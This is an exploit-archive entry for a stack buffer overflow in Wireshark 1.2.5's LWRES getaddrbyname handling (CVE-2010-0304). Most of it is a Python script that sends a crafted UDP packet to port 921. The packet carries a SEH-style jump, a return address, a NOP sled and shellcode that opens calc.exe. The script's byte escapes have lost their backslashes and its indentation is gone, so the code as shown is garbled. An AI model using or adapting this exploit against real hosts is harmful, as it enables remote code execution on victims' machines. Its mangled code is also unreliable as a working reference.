Text :  


# Exploit Title: Wireshark 1.2.5 LWRES getaddrbyname BOF - Calc.exe
# Date: 2-14-2010
# Author: Nullthreat and Pure|Hate
# Software Link:
http://media-2.cacetech.com/wireshark/win32/wireshark-win32-1.2.5.exe
# Version: 1.2.5
# Tested on: Windows XP SP2
# CVE : 2010-0304
# OSVDB-ID: 61987<http://osvdb.org/show/osvdb/61987>
# Code :
#!/usr/bin/env python

# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow
# Discovered by babi
# Exploit Dev by Nullthreat & Pure|Hate


import socket, sys

try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " <host>"
exit(2)

port = 921
addr = (host, port)

leng = 9150
high = int(leng / 256)
low = leng & 255

crash = ("A" * 2128)

# Short jump
jmp = "x90x90x06xeb"

# pop/pop/ret in pcre3 0x61b4121b
ppr = "x1bx12xb4x61"

nop = ("x90" * 24)

# 224 bytes = calc.exe
shellcode = (
"xbfx86x0ax33xa0x2bxc9xdaxd9xd9x74x24xf4xb1"
"x32x5ex31x7ex11x03x7ex11x83xc6x82xe8xc6x5c"
"x62x65x28x9dx72x16xa0x78x43x04xd6x09xf1x98"
"x9cx5cxf9x53xf0x74x8ax16xddx7bx3bx9cx3bxb5"
"xbcx10x84x19x7ex32x78x60x52x94x41xabxa7xd5"
"x86xd6x47x87x5fx9cxf5x38xebxe0xc5x39x3bx6f"
"x75x42x3exb0x01xf8x41xe1xb9x77x09x19xb2xd0"
"xaax18x17x03x96x53x1cxf0x6cx62xf4xc8x8dx54"
"x38x86xb3x58xb5xd6xf4x5fx25xadx0ex9cxd8xb6"
"xd4xdex06x32xc9x79xcdxe4x29x7bx02x72xb9x77"
"xefxf0xe5x9bxeexd5x9dxa0x7bxd8x71x21x3fxff"
"x55x69xe4x9exccxd7x4bx9ex0fxbfx34x3ax5bx52"
"x21x3cx06x39xb4xccx3cx04xb6xcex3ex27xdexff"
"xb5xa8x99xffx1fx8dx55x4ax3dxa4xfdx13xd7xf4"
"x60xa4x0dx3ax9cx27xa4xc3x5bx37xcdxc6x20xff"
"x3dxbbx39x6ax42x68x3axbfx21xefxa8x23xa6xe5"
)

crash2 = ("xcc" * 6752)

data = "x00x00x01x5dx00x00x00x00x4bx49x1cx52x00x01x00x01"
data += "x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00"
data += "x00x00x00x01"
data += chr(high) + chr(low) + crash + jmp + ppr + nop + shellcode +
crash2 + "x00x00"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.sendto(data, addr)
except:
print "can't lookup host"
exit(1)

udps.close()
exit(0)

  References :  

None